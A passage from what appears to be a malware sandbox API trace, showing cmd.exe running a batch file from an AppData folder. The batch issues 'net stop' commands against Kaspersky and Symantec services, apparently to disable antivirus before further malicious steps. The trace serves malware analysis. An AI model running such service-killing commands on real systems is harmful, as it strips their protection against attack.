MemoryPointer=0x3f6cf0) returned 0x5c [0044.193] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0044.193] GetProcessHeap () returned 0x3e0000 [0044.193] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0044.193] GetProcessHeap () returned 0x3e0000 [0044.193] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0044.193] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0044.193] GetProcessHeap () returned 0x3e0000 [0044.193] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0044.193] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.193] GetProcessHeap () returned 0x3e0000 [0044.193] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0044.193] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0044.193] GetProcessHeap () returned 0x3e0000 [0044.193] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0044.193] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.193] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0044.194] GetLastError () returned 0x2 [0044.194] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0044.194] GetLastError () returned 0x2 [0044.194] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.194] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0044.194] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0044.194] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0044.194] GetLastError () returned 0x2 [0044.194] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0044.194] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0044.194] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.195] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0044.195] SetErrorMode (uMode=0x0) returned 0x1 [0044.195] GetProcessHeap () returned 0x3e0000 [0044.195] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0044.195] GetProcessHeap () returned 0x3e0000 [0044.195] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0044.195] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0044.195] GetProcessHeap () returned 0x3e0000 [0044.195] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0044.195] GetProcessHeap () returned 0x3e0000 [0044.195] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0044.195] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0044.195] GetProcessHeap () returned 0x3e0000 [0044.195] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0044.195] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.195] GetProcessHeap () returned 0x3e0000 [0044.195] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0044.195] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0044.195] GetProcessHeap () returned 0x3e0000 [0044.195] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0044.195] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.196] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0044.196] GetLastError () returned 0x2 [0044.196] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0044.196] GetLastError () returned 0x2 [0044.196] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.196] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0044.196] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0044.196] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0044.196] GetLastError () returned 0x2 [0044.196] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0044.196] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0044.196] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.197] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0044.197] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0044.197] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0044.197] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0044.197] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop KAVFS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop KAVFS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop KAVFS /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x878, dwThreadId=0x87c)) returned 1 [0044.201] CloseHandle (hObject=0x78) returned 1 [0044.201] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0044.201] GetProcessHeap () returned 0x3e0000 [0044.201] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0044.201] GetEnvironmentStringsW () returned 0x3f8408* [0044.201] GetProcessHeap () returned 0x3e0000 [0044.201] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0044.201] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0044.201] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0044.395] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0044.396] CloseHandle (hObject=0x74) returned 1 [0044.396] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0044.396] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0044.396] GetProcessHeap () returned 0x3e0000 [0044.396] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0044.396] GetEnvironmentStringsW () returned 0x3f8408* [0044.396] GetProcessHeap () returned 0x3e0000 [0044.396] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0044.396] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0044.396] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0044.396] GetProcessHeap () returned 0x3e0000 [0044.396] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0044.396] GetEnvironmentStringsW () returned 0x3f8408* [0044.396] GetProcessHeap () returned 0x3e0000 [0044.396] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0044.396] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0044.396] GetProcessHeap () returned 0x3e0000 [0044.396] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0044.396] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0044.396] _get_osfhandle (_FileHandle=1) returned 0x264 [0044.396] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0044.396] _get_osfhandle (_FileHandle=1) returned 0x264 [0044.396] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0044.397] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0044.397] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0044.397] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0044.397] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0044.397] SetConsoleInputExeNameW () returned 0x1 [0044.397] GetConsoleOutputCP () returned 0x1b5 [0044.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0044.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0044.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0044.398] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0044.398] _get_osfhandle (_FileHandle=3) returned 0x74 [0044.398] SetFilePointer (in: hFile=0x74, lDistanceToMove=1825, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x721 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0044.398] GetProcessHeap () returned 0x3e0000 [0044.398] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0044.398] _get_osfhandle (_FileHandle=3) returned 0x74 [0044.398] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x721 [0044.398] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x11a0, lpOverlapped=0x0) returned 1 [0044.399] SetFilePointer (in: hFile=0x74, lDistanceToMove=1846, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x736 [0044.399] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop Smcinst /y\r\n/y\r\n ServiceΓÇ¥ /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 21 [0044.399] _get_osfhandle (_FileHandle=3) returned 0x74 [0044.399] GetFileType (hFile=0x74) returned 0x1 [0044.399] _get_osfhandle (_FileHandle=3) returned 0x74 [0044.399] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x736 [0044.399] GetProcessHeap () returned 0x3e0000 [0044.399] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0044.399] GetProcessHeap () returned 0x3e0000 [0044.399] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0044.399] _tell (_FileHandle=3) returned 1846 [0044.399] _close (_FileHandle=3) returned 0 [0044.400] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0044.400] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0044.400] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0044.400] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0044.400] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0044.400] _wcsicmp (_String1="net", _String2="CD") returned 11 [0044.400] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0044.400] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0044.400] _wcsicmp (_String1="net", _String2="REN") returned -4 [0044.400] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0044.400] _wcsicmp (_String1="net", _String2="SET") returned -5 [0044.400] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0044.400] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0044.400] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0044.400] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0044.400] _wcsicmp (_String1="net", _String2="MD") returned 1 [0044.400] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0044.400] _wcsicmp (_String1="net", _String2="RD") returned -4 [0044.400] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0044.400] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0044.400] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0044.400] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0044.400] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0044.400] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0044.400] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0044.400] _wcsicmp (_String1="net", _String2="VER") returned -8 [0044.400] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0044.400] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0044.400] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0044.400] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0044.400] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0044.400] _wcsicmp (_String1="net", _String2="START") returned -5 [0044.400] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0044.400] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0044.400] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0044.400] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0044.401] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0044.401] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0044.401] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0044.401] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0044.401] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0044.401] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0044.401] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0044.401] SetErrorMode (uMode=0x0) returned 0x1 [0044.401] GetProcessHeap () returned 0x3e0000 [0044.401] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0044.401] GetProcessHeap () returned 0x3e0000 [0044.401] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0044.401] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0044.401] GetProcessHeap () returned 0x3e0000 [0044.401] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0044.401] GetProcessHeap () returned 0x3e0000 [0044.401] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0044.401] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0044.401] GetProcessHeap () returned 0x3e0000 [0044.401] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0044.401] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.401] GetProcessHeap () returned 0x3e0000 [0044.401] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0044.401] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0044.401] GetProcessHeap () returned 0x3e0000 [0044.401] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0044.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.401] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0044.402] GetLastError () returned 0x2 [0044.402] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0044.402] GetLastError () returned 0x2 [0044.402] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.402] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0044.402] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0044.402] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0044.402] GetLastError () returned 0x2 [0044.402] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0044.402] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0044.402] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.403] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0044.403] SetErrorMode (uMode=0x0) returned 0x1 [0044.403] GetProcessHeap () returned 0x3e0000 [0044.403] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0044.403] GetProcessHeap () returned 0x3e0000 [0044.403] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0044.403] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0044.403] GetProcessHeap () returned 0x3e0000 [0044.403] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0044.403] GetProcessHeap () returned 0x3e0000 [0044.403] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0044.403] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0044.403] GetProcessHeap () returned 0x3e0000 [0044.403] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0044.403] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.403] GetProcessHeap () returned 0x3e0000 [0044.403] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0044.403] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0044.403] GetProcessHeap () returned 0x3e0000 [0044.403] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0044.403] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.403] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0044.403] GetLastError () returned 0x2 [0044.403] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0044.404] GetLastError () returned 0x2 [0044.404] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.404] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0044.404] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0044.404] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0044.404] GetLastError () returned 0x2 [0044.404] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0044.404] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0044.404] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.404] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, 